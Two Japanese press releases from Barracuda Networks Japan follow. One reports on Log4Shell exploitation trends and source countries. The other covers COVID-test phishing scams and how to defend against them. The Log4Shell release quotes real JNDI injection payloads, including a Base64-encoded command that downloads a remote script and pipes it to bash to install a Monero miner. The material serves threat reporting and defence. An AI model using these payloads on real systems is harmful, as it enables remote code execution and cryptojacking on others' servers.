バラクーダの注目する脅威「Log4Shell脆弱性を狙った攻撃」について調査結果を発表
日本のIPアドレスからの攻撃が、米国に次いで多いことが判明 クラウドファースト・セキュリティソリューションのリーディングプロバイダーであるBarracuda Networks, Inc.(本社:米国カリフォルニア州キャンベル)の日本法人、バラクーダネットワークスジャパン株式会社(東京都品川区、執行役員社長:大越大造、以下「バラクーダネットワークス」)は、本日、「バラクーダの注目する脅威:Log4Shell脆弱性を狙った攻撃」について、調査結果を発表しました。 ハイライト: Log4jの脆弱性「Log4Shell」を利用した攻撃の量は、過去2か月間にわずかな減少や急増が見られるものの、比較的一定。今後もこの攻撃パターンが続くと予想される。 攻撃の大半(83%)は米国のIPアドレスからで、次いで日本(10%)、ドイツ、オランダ、ロシアからも攻撃が送られている。 図1: Log4jの脆弱性を狙った攻撃の比率 詳細: 今回、バラクーダの調査担当者は、2021年12月10日以降にバラクーダのシステムで検出された攻撃とペイロードを分析しました。Log4jのLog4Shellと呼ばれる脆弱性については、大々的に報道される2ヶ月以上前から知られていますが、今回の調査分析によると、これらの脆弱性を利用した攻撃の量は、過去2か月間にわずかな減少や急増が見られるものの、比較的一定であることが判明しました(図1)。このライブラリは広範囲で利用されていること、脆弱性悪用の可能性、侵害による報酬を考えると、少なくとも短期的には、この攻撃パターンが続くと予想されます。 これらの脆弱性を狙った攻撃の量は依然として安定していますが、攻撃の発生源について、当社の研究者が興味深い見解を示しました。攻撃の大半(83%)は米国のIPアドレスからで、その半数はAWS、Azure、その他のデータセンターに関連するものでした。また、日本(10%)、ドイツ、オランダ、ロシアからも攻撃が送られていました(図2)。なお、これらはスキャンを実行し、侵入を試みたIPです。実際のペイロードは、攻撃が成功した場合、他の侵害されたWebサイトやVPSホストから配信されます。ペイロードを配信するこれらのIPは、通常、以下の例で説明するBase64エンコーディングを使って難読化されています。 図2:攻撃者のIPアドレス ペイロードの例: この数ヶ月の間に、これらの脆弱性を悪用しようとしたペイロードの例を下記に紹介します。最初のものは、比較的穏やかな(あるいは、見方によっては非常に迷惑な)ペイロードとなります。調査の結果、これはJavaのペイロードであることが判明しました。このペイロードのYouTube動画では、Rick Astleyの曲「Never Gonna Give You Up」 が再生されます(図3)。 borchuk/3.1${jndi:ldap://-.-.-.-:1389/o=reference,payload=itzbenz.payload.RickRoll} 図3:ペイロード例1 2つ目の例は、脆弱性が顕在化した当初に多く見られた、暗号資産「Monero」のマイニングペイロードです。このペイロードは、複数の異なるIPから出現し、通常、コマンドはbase64で難読化されています。このURLの実際のペイロードは、マイニングをセットアップする下記図のようなスクリプトとなっています。 ${jndi:ldap://-.-.-.-:1389/Deserialization/CommonsCollectionsK2/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2N8fGN1cmwgLW8gLSBodHRwOi8vMTAzLjEwNC43My4xNTU6ODAwMi9hY2MpfC9iaW4vYmFzaA==}" 図4:ペイロード例2 その他、Contiランサムウェアグループが、Log4Shellを利用してVMwareのインストールを侵害しようとしている例も見受けられます。 ペイロードからの保護方法: Log4Shellから保護する最善の方法は、Log4jの最新バージョンへのアップグレードです。ソフトウェアやライブラリを最新の状態に維持し、脆弱性のパッチが適時適用されるようになります。Web アプリケーションで発見される脆弱性数の増加により、攻撃からの保護が次第に複雑になっています。しかし、これらの脆弱性が原因で悪用されないように、Webアプリケーションを保護するオールインワンのソリューションが提供されるようになりました。 Web Application and API Protection (WAAP) サービスとも呼ばれる、WAF/WAF-as-a-Service ソリューションは、最新のセキュリティソリューションをすべて提供する使い勝手の良い製品で、Web アプリケーションを保護することができます。 関連リンク: 市場レポート「2021年のアプリケーションセキュリティの状況」(日本語訳) https://www.barracuda.co.jp/download/appsecreport-final/ Barracuda WAF-as-a-Serviceの詳細 https://www.barracuda.co.jp/products/waf-as-a-service/ バラクーダネットワークスについて 米国Barracuda Networks Inc. の日本法人。ITにまつわる課題をメール保護、ネットワークとアプリのセキュリティ、データ保護の3つの分野において、効率的かつ低コストで業界最高レベルのソリューションを提供しています。バラクーダネットワークス製品は全世界20万社以上のお客様にご利用いただいており、オンプレミス、仮想、クラウド、そしてハイブリッドといった柔軟な導入形態により、あらゆるIT環境で最適化できるよう設計されています。 【本件に関するお問い合わせ】 〒141-0031東京都品川区西五反田8-3-16 西五反田8丁目ビル5階 バラクーダネットワークスジャパン株式会社 E-mail: jsales@barracuda.co.jp TEL: 050-1791-0524
バラクーダの注目する脅威「新型コロナ検査関連メール詐欺」について調査結果を発表
10月から1月にかけて、新型コロナ検査に関連する詐欺の数は521%増加 クラウド対応セキュリティソリューションのリーディングプロバイダーであるBarracuda Networks, Inc.(本社:米国カリフォルニア州キャンベル)の日本法人、バラクーダネットワークスジャパン株式会社(東京都品川区、執行役員社長:大越大造、以下「バラクーダネットワークス」)は、本日、「バラクーダの注目する脅威:新型コロナ検査関連メール詐欺」について、調査結果を発表しました。 ハイライト: 新型コロナ検査関連のフィッシング攻撃―サイバー犯罪者は、新型コロナ検査への需要の高さと現在の検査キット不足の状況を利用して、フィッシング攻撃を仕掛けている。 2021年10月から2022年1月にかけて、新型コロナ検査に関連する詐欺の数は521%増加。 攻撃者は、被害者の注意を引くためにさまざまな手口を利用。 最も一般的な詐欺の例 新型コロナ検査薬や、マスク、手袋などの医療用具を売りつける詐欺。これらの詐欺の中には、偽造品やその他の未承認の製品を販売するものもあります。 新型コロナ検査の未払い通知を装い、詐欺師がPayPalアカウントを提供し、簡易検査の購入を完了させるための支払いを促すもので、被害者の余裕のない状態につけ込んでいます。 新型コロナ検査サービス提供者、研究所、または個々の従業員になりすまし、偽の新型コロナ検査結果を共有します。 図1: 新型コロナ検査関連のフィッシング攻撃 詳細 新型コロナパンデミックは2年近く話題の中心となっていますが、ハッカーたちはこのパンデミックを悪用した攻撃を続けています。2020年3月には、新型コロナウイルスに関するフィッシング攻撃が667%急増し、その後、ワクチン接種プログラムが展開されると、ワクチンに関連する新たな脅威の波が発生しました。最新の変異株である「オミクロン株」は、新型コロナの症例とフィッシング攻撃を再び急増させました。ここ数週間、新型コロナ検査の需要が高まるにつれ、検査の希少性を悪用した詐欺の件数も増加しました。当社の研究者はここ数ヶ月の間、新型コロナ検査に関連するフィッシング攻撃の増加を確認しました。2021年10月から2022年1月にかけて、新型コロナ検査に関連する詐欺の数は521%も増加しました。1日平均は、1月上旬にピークを迎え最近減少していましたが、再び上昇傾向に転じました。 米国保健福祉省監察総監室は、今月初め、特に新型コロナおよび新型コロナ検査に関連した詐欺事件が増加しているとして、国民に注意を促しました。個人情報や医療情報と引き換えに家庭用新型コロナ検査を販売しようとする攻撃者について、警告しています。米国政府は、1世帯あたり4回まで無料で家庭内検査を依頼できるプログラムを1月半ばに開始しましたが、サイバー犯罪者はこのプログラムを利用する可能性があります。 新型コロナウイルス関連の詐欺が、個人と企業をターゲットに続いています。一部の組織では、従業員をオフィスに戻そうと、最新のポリシーを送ったり、従業員のワクチン接種状況について情報を求めたりしています。ハッカーはこのような会話を乗っ取ります。バラクーダの調査で見つかったある具体的な例では、サイバー犯罪者が人事部になりすまし、アカウントの認証情報を盗むために、フィッシングサイトでホストされているファイルを従業員と共有しました。攻撃者は、Office 365のロゴを真似て、ドキュメントがウイルスやスパムコンテンツに関してすでにスキャンされていることを表示しています。 図2:詐欺メールの例 新型コロナ検査関連フィッシング詐欺への対策: 新型コロナ検査に関連する全てのメールを疑う 詐欺メールの中には、新型コロナ検査キットの購入、すぐに利用できる検査の情報提供、検査結果の共有などを持ちかけるものがあります。予期しないメールのリンクをクリックしたり、添付ファイルを開いたりしないようにしましょう。 人工知能の活用 攻撃者は、ゲートウェイやスパムフィルターを回避するためにメールの手口を変えています。そのため、ブランドのなりすまし、ビジネスメール詐欺、メールアカウント乗っ取りなどのスピアフィッシング攻撃を検知し、防御するソリューションが重要となります。悪意のあるリンクや添付ファイルの確認だけに頼らない、目的に応じたテクノロジーの導入が必要です。機械学習を使用した、組織内の通常の通信パターンの分析により、攻撃を示唆する異常を発見することができます。 アカウント乗っ取り防止策の導入 外部からのメールメッセージに注目するだけでは不十分です。最も破壊的で成功したスピアフィッシング攻撃には、漏洩した社内アカウントから発生する場合があります。攻撃者が、これらの攻撃を開始するためのベースキャンプとして、あなたの組織を使用していないことを確認する必要があります。人工知能を使用して、アカウントが侵害されたことを認識し、ユーザに警告を発し、侵害されたアカウントから送信された悪意のあるメールを削除して、リアルタイムで修復するテクノロジーの導入が必要です。 攻撃を認識し報告するためのスタッフのトレーニング スピアフィッシング攻撃について、ユーザを教育します。新型コロナウイルスに関連するフィッシング、季節的な詐欺、その他の潜在的な脅威に関する最新のユーザ啓発トレーニングを従業員に実施する必要があります。社員が最新の攻撃を認識し、すぐにIT部門に報告する方法を知っていることを確認します。メール、ボイスメール、SMSのフィッシング・シミュレーションを使用して、サイバー攻撃を識別するためのユーザ・トレーニングを行い、トレーニングの効果を検証し、最も脆弱なユーザを評価します。 不正を防止する強力な社内ポリシーを設定 すべての企業は、個人情報や財務情報が適切に取り扱われるよう、既存のポリシーを策定し、定期的に見直す必要があります。電信送金や支払変更に関するすべてのメール依頼を確認するためのガイドラインを作成し、手順を整備することで、従業員がコストのかかるミスを回避できるようにします。すべての金融取引について、複数人による直接または電話による確認と承認を求めます。 関連リンク: スピアフィッシングレポート:主要な攻撃と攻撃トレンド~攻撃者の進化した戦術と標的となる人物に関する洞察~(2021年7月 Vol.6) https://www.barracuda.co.jp/download/spearphishingreport-vol6-jp/ バラクーダが注目する脅威: コロナウイルス関連のフィッシング(メールセキュリティ) https://www.barracuda.co.jp/threat-spotlight-coronavirus-related-phishing/ バラクーダネットワークスについて 米国Barracuda Networks Inc. の日本法人。ITにまつわる課題をメール保護、ネットワークとアプリのセキュリティ、データ保護の3つの分野において、効率的かつ低コストで業界最高レベルのソリューションを提供しています。バラクーダネットワークス製品は全世界20万社以上のお客様にご利用いただいており、オンプレミス、仮想、クラウド、そしてハイブリッドといった柔軟な導入形態により、あらゆるIT環境で最適化できるよう設計されています。 【本件に関するお問い合わせ】 〒141-0031東京都品川区西五反田8-3-16 西五反田8丁目ビル5階 バラクーダネットワークスジャパン株式会社 E-mail: jsales@barracuda.co.jp TEL: 050-1791-0524
